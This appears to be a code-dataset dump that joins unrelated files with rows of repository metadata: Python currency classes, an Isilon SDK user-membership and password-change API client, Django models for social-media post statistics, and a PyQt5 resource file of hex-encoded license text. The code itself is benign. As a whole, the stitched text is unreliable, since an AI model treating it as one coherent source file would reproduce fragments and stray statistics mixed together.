currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'PhilippinePeso':
"""Class creator.
Returns:
PhilippinePeso: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='PHP',
numeric_code='608',
symbol='₱',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='₱',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class PesoUruguayo(Currency):
"""Peso Uruguayo currency representation.
Simple usage example:
>>> from multicurrency import PesoUruguayo
>>> peso_uruguayo = PesoUruguayo(
... amount=123456.789)
>>> print(peso_uruguayo)
$ 123.456,79
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'PesoUruguayo':
"""Class creator.
Returns:
PesoUruguayo: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='UYU',
numeric_code='858',
symbol='$',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='UY$',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
| 36.080827 | 77 | 0.594217 | 1,873 | 19,195 | 5.916177 | 0.074212 | 0.050537 | 0.034654 | 0.027434 | 0.865806 | 0.865806 | 0.865806 | 0.865806 | 0.860121 | 0.817796 | 0 | 0.01573 | 0.311123 | 19,195 | 531 | 78 | 36.148776 | 0.822052 | 0.50112 | 0 | 0.801762 | 0 | 0 | 0.024373 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035242 | false | 0 | 0.013216 | 0 | 0.154185 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1c13ccb223f7b1a78fa9171827d05e1d5f58a1f4 | 20,275 | py | Python | isi_sdk_9_0_0/isi_sdk_9_0_0/api/auth_users_api.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 24 | 2018-06-22T14:13:23.000Z | 2022-03-23T01:21:26.000Z | isi_sdk_9_0_0/isi_sdk_9_0_0/api/auth_users_api.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 46 | 2018-04-30T13:28:22.000Z | 2022-03-21T21:11:07.000Z | isi_sdk_9_0_0/isi_sdk_9_0_0/api/auth_users_api.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 29 | 2018-06-19T00:14:04.000Z | 2022-02-08T17:51:19.000Z | # coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 10
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from isi_sdk_9_0_0.api_client import ApiClient
class AuthUsersApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_user_member_of_item(self, user_member_of_item, user, **kwargs): # noqa: E501
"""create_user_member_of_item # noqa: E501
Add the user to a group. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_user_member_of_item(user_member_of_item, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AuthAccessAccessItemFileGroup user_member_of_item: (required)
:param str user: (required)
:param str zone: Filter groups by zone.
:param str provider: Filter groups by provider.
:return: CreateResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_user_member_of_item_with_http_info(user_member_of_item, user, **kwargs) # noqa: E501
else:
(data) = self.create_user_member_of_item_with_http_info(user_member_of_item, user, **kwargs) # noqa: E501
return data
def create_user_member_of_item_with_http_info(self, user_member_of_item, user, **kwargs): # noqa: E501
"""create_user_member_of_item # noqa: E501
Add the user to a group. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_user_member_of_item_with_http_info(user_member_of_item, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AuthAccessAccessItemFileGroup user_member_of_item: (required)
:param str user: (required)
:param str zone: Filter groups by zone.
:param str provider: Filter groups by provider.
:return: CreateResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_member_of_item', 'user', 'zone', 'provider'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_user_member_of_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_member_of_item' is set
if ('user_member_of_item' not in params or
params['user_member_of_item'] is None):
raise ValueError("Missing the required parameter `user_member_of_item` when calling `create_user_member_of_item`") # noqa: E501
# verify the required parameter 'user' is set
if ('user' not in params or
params['user'] is None):
raise ValueError("Missing the required parameter `user` when calling `create_user_member_of_item`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user' in params:
path_params['User'] = params['user'] # noqa: E501
query_params = []
if 'zone' in params:
query_params.append(('zone', params['zone'])) # noqa: E501
if 'provider' in params:
query_params.append(('provider', params['provider'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'user_member_of_item' in params:
body_params = params['user_member_of_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/auth/users/{User}/member-of', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_user_member_of_member_of(self, user_member_of_member_of, user, **kwargs): # noqa: E501
"""delete_user_member_of_member_of # noqa: E501
Remove the user from the group. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_user_member_of_member_of(user_member_of_member_of, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user_member_of_member_of: Remove the user from the group. (required)
:param str user: (required)
:param str zone: Filter groups by zone.
:param str provider: Filter groups by provider.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_user_member_of_member_of_with_http_info(user_member_of_member_of, user, **kwargs) # noqa: E501
else:
(data) = self.delete_user_member_of_member_of_with_http_info(user_member_of_member_of, user, **kwargs) # noqa: E501
return data
def delete_user_member_of_member_of_with_http_info(self, user_member_of_member_of, user, **kwargs): # noqa: E501
"""delete_user_member_of_member_of # noqa: E501
Remove the user from the group. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_user_member_of_member_of_with_http_info(user_member_of_member_of, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user_member_of_member_of: Remove the user from the group. (required)
:param str user: (required)
:param str zone: Filter groups by zone.
:param str provider: Filter groups by provider.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_member_of_member_of', 'user', 'zone', 'provider'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_user_member_of_member_of" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_member_of_member_of' is set
if ('user_member_of_member_of' not in params or
params['user_member_of_member_of'] is None):
raise ValueError("Missing the required parameter `user_member_of_member_of` when calling `delete_user_member_of_member_of`") # noqa: E501
# verify the required parameter 'user' is set
if ('user' not in params or
params['user'] is None):
raise ValueError("Missing the required parameter `user` when calling `delete_user_member_of_member_of`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user_member_of_member_of' in params:
path_params['UserMemberOfMemberOf'] = params['user_member_of_member_of'] # noqa: E501
if 'user' in params:
path_params['User'] = params['user'] # noqa: E501
query_params = []
if 'zone' in params:
query_params.append(('zone', params['zone'])) # noqa: E501
if 'provider' in params:
query_params.append(('provider', params['provider'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/auth/users/{User}/member-of/{UserMemberOfMemberOf}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_user_member_of(self, user, **kwargs): # noqa: E501
"""list_user_member_of # noqa: E501
List all groups the user is a member of. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_user_member_of(user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user: (required)
:param bool resolve_names: Resolve names of personas.
:param str zone: Filter groups by zone.
:param str provider: Filter groups by provider.
:return: UserMemberOf
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_user_member_of_with_http_info(user, **kwargs) # noqa: E501
else:
(data) = self.list_user_member_of_with_http_info(user, **kwargs) # noqa: E501
return data
def list_user_member_of_with_http_info(self, user, **kwargs): # noqa: E501
"""list_user_member_of # noqa: E501
List all groups the user is a member of. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_user_member_of_with_http_info(user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user: (required)
:param bool resolve_names: Resolve names of personas.
:param str zone: Filter groups by zone.
:param str provider: Filter groups by provider.
:return: UserMemberOf
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user', 'resolve_names', 'zone', 'provider'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_user_member_of" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user' is set
if ('user' not in params or
params['user'] is None):
raise ValueError("Missing the required parameter `user` when calling `list_user_member_of`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user' in params:
path_params['User'] = params['user'] # noqa: E501
query_params = []
if 'resolve_names' in params:
query_params.append(('resolve_names', params['resolve_names'])) # noqa: E501
if 'zone' in params:
query_params.append(('zone', params['zone'])) # noqa: E501
if 'provider' in params:
query_params.append(('provider', params['provider'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/auth/users/{User}/member-of', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserMemberOf', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_user_change_password(self, user_change_password, user, **kwargs): # noqa: E501
"""update_user_change_password # noqa: E501
Change the user's password. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_user_change_password(user_change_password, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param UserChangePassword user_change_password: (required)
:param str user: (required)
:param str zone: Specifies access zone containing user.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_user_change_password_with_http_info(user_change_password, user, **kwargs) # noqa: E501
else:
(data) = self.update_user_change_password_with_http_info(user_change_password, user, **kwargs) # noqa: E501
return data
def update_user_change_password_with_http_info(self, user_change_password, user, **kwargs): # noqa: E501
"""update_user_change_password # noqa: E501
Change the user's password. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_user_change_password_with_http_info(user_change_password, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param UserChangePassword user_change_password: (required)
:param str user: (required)
:param str zone: Specifies access zone containing user.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_change_password', 'user', 'zone'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_user_change_password" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_change_password' is set
if ('user_change_password' not in params or
params['user_change_password'] is None):
raise ValueError("Missing the required parameter `user_change_password` when calling `update_user_change_password`") # noqa: E501
# verify the required parameter 'user' is set
if ('user' not in params or
params['user'] is None):
raise ValueError("Missing the required parameter `user` when calling `update_user_change_password`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user' in params:
path_params['User'] = params['user'] # noqa: E501
query_params = []
if 'zone' in params:
query_params.append(('zone', params['zone'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'user_change_password' in params:
body_params = params['user_change_password']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/auth/users/{User}/change-password', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 41.632444 | 150 | 0.625499 | 2,446 | 20,275 | 4.901472 | 0.072772 | 0.062057 | 0.06506 | 0.034698 | 0.938527 | 0.928268 | 0.908082 | 0.884227 | 0.868963 | 0.856869 | 0 | 0.01694 | 0.283748 | 20,275 | 486 | 151 | 41.718107 | 0.808635 | 0.332182 | 0 | 0.75 | 1 | 0 | 0.215779 | 0.073929 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035156 | false | 0.050781 | 0.015625 | 0 | 0.101563 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
1c207c882b329dc261224eab7ca0fdf770815197 | 1,489 | py | Python | home/models.py | Reekomer/kpis | 02d346378da8646122604f6b178c7853bdaf9eed | [
"MIT"
] | null | null | null | home/models.py | Reekomer/kpis | 02d346378da8646122604f6b178c7853bdaf9eed | [
"MIT"
] | null | null | null | home/models.py | Reekomer/kpis | 02d346378da8646122604f6b178c7853bdaf9eed | [
"MIT"
] | null | null | null | from django.db import models
from django.utils.encoding import python_2_unicode_compatible
# Create your models here.
@python_2_unicode_compatible
class Stoyo(models.Model):
datepub = models.DateField(max_length=30)
page_name = models.CharField(max_length=100)
title = models.CharField(max_length=100)
link = models.CharField(max_length=100,unique=True)
reactions = models.IntegerField()
comments = models.IntegerField()
shares = models.IntegerField()
views = models.IntegerField()
def __str__(self):
return "Stoyo: {}".format(self.link)
#@python_2_unicode_compatible
class Publisher(models.Model):
datepub = models.DateField(max_length=30, null=True)
page_name = models.CharField(max_length=100)
title = models.CharField(max_length=100)
link = models.CharField(max_length=100,unique=True)
reactions = models.IntegerField(null=True)
comments = models.IntegerField(null=True)
shares = models.IntegerField(null=True)
views = models.IntegerField(null=True)
update = models.DateTimeField(null=True)
class Temporary(models.Model):
datepub = models.DateField(max_length=30, null=True)
page_name = models.CharField(max_length=100)
title = models.CharField(max_length=100)
link = models.CharField(max_length=100,unique=True)
reactions = models.IntegerField(null=True)
comments = models.IntegerField(null=True)
shares = models.IntegerField(null=True)
views = models.IntegerField(null=True)
update = models.DateTimeField(null=True)
| 35.452381 | 61 | 0.770987 | 193 | 1,489 | 5.803109 | 0.233161 | 0.096429 | 0.144643 | 0.192857 | 0.791964 | 0.740179 | 0.740179 | 0.740179 | 0.700893 | 0.700893 | 0 | 0.027356 | 0.116185 | 1,489 | 41 | 62 | 36.317073 | 0.823708 | 0.034923 | 0 | 0.617647 | 0 | 0 | 0.006276 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029412 | false | 0 | 0.058824 | 0.029412 | 0.970588 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
1c61f9ec69c569f1415067b1f6256687483ed817 | 13,036 | py | Python | software/qt_examples/src/pyqt-official/quick/scenegraph/customgeometry/customgeometry_rc.py | idetore/CASPER | 48725e40580b942e20bea760c681d99395ac7557 | [
"MIT"
] | null | null | null | software/qt_examples/src/pyqt-official/quick/scenegraph/customgeometry/customgeometry_rc.py | idetore/CASPER | 48725e40580b942e20bea760c681d99395ac7557 | [
"MIT"
] | null | null | null | software/qt_examples/src/pyqt-official/quick/scenegraph/customgeometry/customgeometry_rc.py | idetore/CASPER | 48725e40580b942e20bea760c681d99395ac7557 | [
"MIT"
] | 1 | 2020-02-14T21:43:29.000Z | 2020-02-14T21:43:29.000Z | # -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.8.0)
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore
qt_resource_data = b"\
\x00\x00\x0a\xac\
\x2f\
\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\
\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\
\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\
\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\
\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0a\x2a\x2a\x0a\
\x2a\x2a\x20\x43\x6f\x70\x79\x72\x69\x67\x68\x74\x20\x28\x43\x29\
\x20\x32\x30\x31\x33\x20\x44\x69\x67\x69\x61\x20\x50\x6c\x63\x20\
\x61\x6e\x64\x2f\x6f\x72\x20\x69\x74\x73\x20\x73\x75\x62\x73\x69\
\x64\x69\x61\x72\x79\x28\x2d\x69\x65\x73\x29\x2e\x0a\x2a\x2a\x20\
\x43\x6f\x6e\x74\x61\x63\x74\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\
\x77\x77\x77\x2e\x71\x74\x2d\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\
\x72\x67\x2f\x6c\x65\x67\x61\x6c\x0a\x2a\x2a\x0a\x2a\x2a\x20\x54\
\x68\x69\x73\x20\x66\x69\x6c\x65\x20\x69\x73\x20\x70\x61\x72\x74\
\x20\x6f\x66\x20\x74\x68\x65\x20\x64\x65\x6d\x6f\x6e\x73\x74\x72\
\x61\x74\x69\x6f\x6e\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\
\x6e\x73\x20\x6f\x66\x20\x74\x68\x65\x20\x51\x74\x20\x54\x6f\x6f\
\x6c\x6b\x69\x74\x2e\x0a\x2a\x2a\x0a\x2a\x2a\x20\x24\x51\x54\x5f\
\x42\x45\x47\x49\x4e\x5f\x4c\x49\x43\x45\x4e\x53\x45\x3a\x4c\x47\
\x50\x4c\x24\x0a\x2a\x2a\x20\x43\x6f\x6d\x6d\x65\x72\x63\x69\x61\
\x6c\x20\x4c\x69\x63\x65\x6e\x73\x65\x20\x55\x73\x61\x67\x65\x0a\
\x2a\x2a\x20\x4c\x69\x63\x65\x6e\x73\x65\x65\x73\x20\x68\x6f\x6c\
\x64\x69\x6e\x67\x20\x76\x61\x6c\x69\x64\x20\x63\x6f\x6d\x6d\x65\
\x72\x63\x69\x61\x6c\x20\x51\x74\x20\x6c\x69\x63\x65\x6e\x73\x65\
\x73\x20\x6d\x61\x79\x20\x75\x73\x65\x20\x74\x68\x69\x73\x20\x66\
\x69\x6c\x65\x20\x69\x6e\x0a\x2a\x2a\x20\x61\x63\x63\x6f\x72\x64\
\x61\x6e\x63\x65\x20\x77\x69\x74\x68\x20\x74\x68\x65\x20\x63\x6f\
\x6d\x6d\x65\x72\x63\x69\x61\x6c\x20\x6c\x69\x63\x65\x6e\x73\x65\
\x20\x61\x67\x72\x65\x65\x6d\x65\x6e\x74\x20\x70\x72\x6f\x76\x69\
\x64\x65\x64\x20\x77\x69\x74\x68\x20\x74\x68\x65\x0a\x2a\x2a\x20\
\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6f\x72\x2c\x20\x61\x6c\x74\
\x65\x72\x6e\x61\x74\x69\x76\x65\x6c\x79\x2c\x20\x69\x6e\x20\x61\
\x63\x63\x6f\x72\x64\x61\x6e\x63\x65\x20\x77\x69\x74\x68\x20\x74\
\x68\x65\x20\x74\x65\x72\x6d\x73\x20\x63\x6f\x6e\x74\x61\x69\x6e\
\x65\x64\x20\x69\x6e\x0a\x2a\x2a\x20\x61\x20\x77\x72\x69\x74\x74\
\x65\x6e\x20\x61\x67\x72\x65\x65\x6d\x65\x6e\x74\x20\x62\x65\x74\
\x77\x65\x65\x6e\x20\x79\x6f\x75\x20\x61\x6e\x64\x20\x44\x69\x67\
\x69\x61\x2e\x20\x20\x46\x6f\x72\x20\x6c\x69\x63\x65\x6e\x73\x69\
\x6e\x67\x20\x74\x65\x72\x6d\x73\x20\x61\x6e\x64\x0a\x2a\x2a\x20\
\x63\x6f\x6e\x64\x69\x74\x69\x6f\x6e\x73\x20\x73\x65\x65\x20\x68\
\x74\x74\x70\x3a\x2f\x2f\x71\x74\x2e\x64\x69\x67\x69\x61\x2e\x63\
\x6f\x6d\x2f\x6c\x69\x63\x65\x6e\x73\x69\x6e\x67\x2e\x20\x20\x46\
\x6f\x72\x20\x66\x75\x72\x74\x68\x65\x72\x20\x69\x6e\x66\x6f\x72\
\x6d\x61\x74\x69\x6f\x6e\x0a\x2a\x2a\x20\x75\x73\x65\x20\x74\x68\
\x65\x20\x63\x6f\x6e\x74\x61\x63\x74\x20\x66\x6f\x72\x6d\x20\x61\
\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f\x71\x74\x2e\x64\x69\x67\x69\
\x61\x2e\x63\x6f\x6d\x2f\x63\x6f\x6e\x74\x61\x63\x74\x2d\x75\x73\
\x2e\x0a\x2a\x2a\x0a\x2a\x2a\x20\x47\x4e\x55\x20\x4c\x65\x73\x73\
\x65\x72\x20\x47\x65\x6e\x65\x72\x61\x6c\x20\x50\x75\x62\x6c\x69\
\x63\x20\x4c\x69\x63\x65\x6e\x73\x65\x20\x55\x73\x61\x67\x65\x0a\
\x2a\x2a\x20\x41\x6c\x74\x65\x72\x6e\x61\x74\x69\x76\x65\x6c\x79\
\x2c\x20\x74\x68\x69\x73\x20\x66\x69\x6c\x65\x20\x6d\x61\x79\x20\
\x62\x65\x20\x75\x73\x65\x64\x20\x75\x6e\x64\x65\x72\x20\x74\x68\
\x65\x20\x74\x65\x72\x6d\x73\x20\x6f\x66\x20\x74\x68\x65\x20\x47\
\x4e\x55\x20\x4c\x65\x73\x73\x65\x72\x0a\x2a\x2a\x20\x47\x65\x6e\
\x65\x72\x61\x6c\x20\x50\x75\x62\x6c\x69\x63\x20\x4c\x69\x63\x65\
\x6e\x73\x65\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x32\x2e\x31\x20\
\x61\x73\x20\x70\x75\x62\x6c\x69\x73\x68\x65\x64\x20\x62\x79\x20\
\x74\x68\x65\x20\x46\x72\x65\x65\x20\x53\x6f\x66\x74\x77\x61\x72\
\x65\x0a\x2a\x2a\x20\x46\x6f\x75\x6e\x64\x61\x74\x69\x6f\x6e\x20\
\x61\x6e\x64\x20\x61\x70\x70\x65\x61\x72\x69\x6e\x67\x20\x69\x6e\
\x20\x74\x68\x65\x20\x66\x69\x6c\x65\x20\x4c\x49\x43\x45\x4e\x53\
\x45\x2e\x4c\x47\x50\x4c\x20\x69\x6e\x63\x6c\x75\x64\x65\x64\x20\
\x69\x6e\x20\x74\x68\x65\x0a\x2a\x2a\x20\x70\x61\x63\x6b\x61\x67\
\x69\x6e\x67\x20\x6f\x66\x20\x74\x68\x69\x73\x20\x66\x69\x6c\x65\
\x2e\x20\x20\x50\x6c\x65\x61\x73\x65\x20\x72\x65\x76\x69\x65\x77\
\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x69\
\x6e\x66\x6f\x72\x6d\x61\x74\x69\x6f\x6e\x20\x74\x6f\x0a\x2a\x2a\
\x20\x65\x6e\x73\x75\x72\x65\x20\x74\x68\x65\x20\x47\x4e\x55\x20\
\x4c\x65\x73\x73\x65\x72\x20\x47\x65\x6e\x65\x72\x61\x6c\x20\x50\
\x75\x62\x6c\x69\x63\x20\x4c\x69\x63\x65\x6e\x73\x65\x20\x76\x65\
\x72\x73\x69\x6f\x6e\x20\x32\x2e\x31\x20\x72\x65\x71\x75\x69\x72\
\x65\x6d\x65\x6e\x74\x73\x0a\x2a\x2a\x20\x77\x69\x6c\x6c\x20\x62\
\x65\x20\x6d\x65\x74\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\
\x77\x2e\x67\x6e\x75\x2e\x6f\x72\x67\x2f\x6c\x69\x63\x65\x6e\x73\
\x65\x73\x2f\x6f\x6c\x64\x2d\x6c\x69\x63\x65\x6e\x73\x65\x73\x2f\
\x6c\x67\x70\x6c\x2d\x32\x2e\x31\x2e\x68\x74\x6d\x6c\x2e\x0a\x2a\
\x2a\x0a\x2a\x2a\x20\x49\x6e\x20\x61\x64\x64\x69\x74\x69\x6f\x6e\
\x2c\x20\x61\x73\x20\x61\x20\x73\x70\x65\x63\x69\x61\x6c\x20\x65\
\x78\x63\x65\x70\x74\x69\x6f\x6e\x2c\x20\x44\x69\x67\x69\x61\x20\
